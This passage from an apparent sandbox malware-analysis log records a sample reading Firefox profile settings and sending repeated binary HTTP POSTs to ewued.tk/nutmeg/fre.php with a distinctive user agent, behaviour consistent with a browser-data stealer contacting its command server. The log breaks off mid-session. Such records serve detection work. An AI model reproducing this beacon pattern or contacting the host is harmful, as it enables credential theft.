Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	2	Fn
Set Environment String	name = PATH, value = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Mozilla Firefox	1	Fn
Set Environment String	name = PATH, value = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn

Ini (2)

Operation	Filename	Additional Information	Success	Count	Logfile
Read	C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\profiles.ini	section_name = Profile0, key_name = Path, data_out = Profiles/8i341t8m.default		1	Fn
Read	C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\profiles.ini	section_name = Profile1, key_name = Path		1	Fn

Network Behavior

DNS (46)

Operation	Additional Information	Count	Logfile
Resolve Name	host = ewued.tk, address_out = 104.24.103.63, 104.24.102.63, service = 80	5	Fn
Resolve Name	host = ÅÐÐÑÐÐÑ, service = 80	22	Fn
Resolve Name	host = ewued.tk, address_out = 104.24.102.63, 104.24.103.63, service = 80	19	Fn

TCP Sessions (22)

Information	Value
Total Data Sent	8.58 KB
Total Data Received	7.73 KB
Contacted Host Count	2
Contacted Hosts	104.24.103.63:80, 104.24.102.63:80

TCP Session #1

Information	Value
Handle	0x26c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	104.24.103.63
Remote Port	80
Local Address	0.0.0.0
Local Port	49426
Data Sent	425 bytes
Data Received	352 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 104.24.103.63, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 235, size_out = 235	1	Fn Data
Send	flags = NO_FLAG_SET, size = 190, size_out = 190	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4048, size_out = 352	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

TCP Session #2

Information	Value
Handle	0x26c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	104.24.103.63
Remote Port	80
Local Address	0.0.0.0
Local Port	49426
Data Sent	398 bytes
Data Received	360 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 104.24.103.63, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 235, size_out = 235	1	Fn Data
Send	flags = NO_FLAG_SET, size = 163, size_out = 163	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4048, size_out = 360	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

TCP Session #3

Information	Value
Handle	0x25c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	104.24.103.63
Remote Port	80
Local Address	0.0.0.0
Local Port	49432
Data Sent	398 bytes
Data Received	360 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 104.24.103.63, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 235, size_out = 235	1	Fn Data
Send	flags = NO_FLAG_SET, size = 163, size_out = 163	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4048, size_out = 360	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

TCP Session #4

Information	Value
Handle	0x294
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	104.24.103.63
Remote Port	80
Local Address	0.0.0.0
Local Port	49433
Data Sent	398 bytes
Data Received	360 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 104.24.103.63, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 235, size_out = 235	1	Fn Data
Send	flags = NO_FLAG_SET, size = 163, size_out = 163	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4048, size_out = 360	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

TCP Session #5

Information	Value
Handle	0x2a0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	104.24.102.63
Remote Port	80
Local Address	0.0.0.0
Local Port	49434
Data Sent	398 bytes
Data Received	360 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 104.24.102.63, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 235, size_out = 235	1	Fn Data
Send	flags = NO_FLAG_SET, size = 163, size_out = 163	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4048, size_out = 360	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

TCP Session #6

Information	Value
Handle	0x2a4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	104.24.102.63
Remote Port	80
Local Address	0.0.0.0
Local Port	49435
Data Sent	398 bytes
Data Received	360 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 104.24.102.63, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 235, size_out = 235	1	Fn Data
Send	flags = NO_FLAG_SET, size = 163, size_out = 163	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4048, size_out = 360	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

TCP Session #7

Information	Value
Handle	0x1f4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	104.24.102.63
Remote Port	80
Local Address	0.0.0.0
Local Port	49436
Data Sent	398 bytes
Data Received	360 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 104.24.102.63, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 235, size_out = 235	1	Fn Data
Send	flags = NO_FLAG_SET, size = 163, size_out = 163	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4048, size_out = 360	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

TCP Session #8

Information	Value
Handle	0x220
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	104.24.102.63
Remote Port	80
Local Address	0.0.0.0
Local Port	49437
Data Sent	398 bytes
Data Received	360 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 104.24.102.63, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 235, size_out = 235	1	Fn Data
Send	flags = NO_FLAG_SET, size = 163, size_out = 163	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4048, size_out = 360	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

TCP Session #9

Information	Value
Handle	0x2b0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	104.24.102.63
Remote Port	80
Local Address	0.0.0.0
Local Port	49438
Data Sent	398 bytes
Data Received	360 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 104.24.102.63, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 235, size_out = 235	1	Fn Data
Send	flags = NO_FLAG_SET, size = 163, size_out = 163	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4048, size_out = 360	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

TCP Session #10

Information	Value
Handle	0x2b4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	104.24.102.63
Remote Port	80
Local Address	0.0.0.0
Local Port	49439
Data Sent	398 bytes
Data Received	360 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 104.24.102.63, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 235, size_out = 235	1	Fn Data
Send	flags = NO_FLAG_SET, size = 163, size_out = 163	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4048, size_out = 360	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

TCP Session #11

Information	Value
Handle	0x2b8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	104.24.102.63
Remote Port	80
Local Address	0.0.0.0
Local Port	49440
Data Sent	398 bytes
Data Received	360 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 104.24.102.63, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 235, size_out = 235	1	Fn Data
Send	flags = NO_FLAG_SET, size = 163, size_out = 163	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4048, size_out = 360	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

TCP Session #12

Information	Value
Handle	0x2bc
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	104.24.102.63
Remote Port	80
Local Address	0.0.0.0
Local Port	49441
Data Sent	398 bytes
Data Received	360 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 104.24.102.63, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 235, size_out = 235	1	Fn Data
Send	flags = NO_FLAG_SET, size = 163, size_out = 163	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4048, size_out = 360	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

TCP Session #13

Information	Value
Handle	0x2c0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	104.24.102.63
Remote Port	80
Local Address	0.0.0.0
Local Port	49442
Data Sent	398 bytes
Data Received	360 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 104.24.102.63, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 235, size_out = 235	1	Fn Data
Send	flags = NO_FLAG_SET, size = 163, size_out = 163	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4048, size_out = 360	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

TCP Session #14

Information	Value
Handle	0x298
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	104.24.102.63
Remote Port	80
Local Address	0.0.0.0
Local Port	49443
Data Sent	398 bytes
Data Received	360 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 104.24.102.63, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 235, size_out = 235	1	Fn Data
Send	flags = NO_FLAG_SET, size = 163, size_out = 163	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4048, size_out = 360	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

TCP Session #15

Information	Value
Handle	0x29c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	104.24.102.63
Remote Port	80
Local Address	0.0.0.0
Local Port	49444
Data Sent	398 bytes
Data Received	360 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 104.24.102.63, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 235, size_out = 235	1	Fn Data
Send	flags = NO_FLAG_SET, size = 163, size_out = 163	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4048, size_out = 360	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

TCP Session #16

Information	Value
Handle	0x2c4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	104.24.102.63
Remote Port	80
Local Address	0.0.0.0
Local Port	49445
Data Sent	398 bytes
Data Received	360 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 104.24.102.63, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 235, size_out = 235	1	Fn Data
Send	flags = NO_FLAG_SET, size = 163, size_out = 163	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4048, size_out = 360	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

TCP Session #17

Information	Value
Handle	0x2c8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	104.24.102.63
Remote Port	80
Local Address	0.0.0.0
Local Port	49446
Data Sent	398 bytes
Data Received	360 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 104.24.102.63, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 235, size_out = 235	1	Fn Data
Send	flags = NO_FLAG_SET, size = 163, size_out = 163	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4048, size_out = 360	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

TCP Session #18

Information	Value
Handle	0x2cc
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	104.24.102.63
Remote Port	80
Local Address	0.0.0.0
Local Port	49447
Data Sent	398 bytes
Data Received	360 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 104.24.102.63, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 235, size_out = 235	1	Fn Data
Send	flags = NO_FLAG_SET, size = 163, size_out = 163	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4048, size_out = 360	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

TCP Session #19

Information	Value
Handle	0x2d8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	104.24.102.63
Remote Port	80
Local Address	0.0.0.0
Local Port	49448
Data Sent	398 bytes
Data Received	360 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 104.24.102.63, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 235, size_out = 235	1	Fn Data
Send	flags = NO_FLAG_SET, size = 163, size_out = 163	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4048, size_out = 360	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

TCP Session #20

Information	Value
Handle	0x2dc
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	104.24.102.63
Remote Port	80
Local Address	0.0.0.0
Local Port	49451
Data Sent	398 bytes
Data Received	360 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 104.24.102.63, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 235, size_out = 235	1	Fn Data
Send	flags = NO_FLAG_SET, size = 163, size_out = 163	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4048, size_out = 360	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

TCP Session #21

Information	Value
Handle	0x2e0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	104.24.102.63
Remote Port	80
Local Address	0.0.0.0
Local Port	49452
Data Sent	398 bytes
Data Received	360 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 104.24.102.63, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 235, size_out = 235	1	Fn Data
Send	flags = NO_FLAG_SET, size = 163, size_out = 163	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4048, size_out = 360	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

TCP Session #22

Information	Value
Handle	0x2e4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	104.24.102.63
Remote Port	80
Local Address	0.0.0.0
Local Port	49453
Data Sent	398 bytes
Data Received	360 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 104.24.102.63, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 235, size_out = 235	1	Fn Data
Send	flags = NO_FLAG_SET, size = 163, size_out = 163	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4048, size_out = 360	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

HTTP Sessions (23)

Information	Value
Total Data Sent	5.28 KB
Total Data Received	0 bytes
Contacted Host Count	1
Contacted Hosts	ewued.tk

HTTP Session #1

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 254, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

HTTP Session #2

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 190, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

HTTP Session #3

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

HTTP Session #4

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

HTTP Session #5

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

HTTP Session #6

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

HTTP Session #7

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

HTTP Session #8

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

HTTP Session #9

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

HTTP Session #10

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

HTTP Session #11

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

HTTP Session #12

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

HTTP Session #13

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

HTTP Session #14

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

HTTP Session #15

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
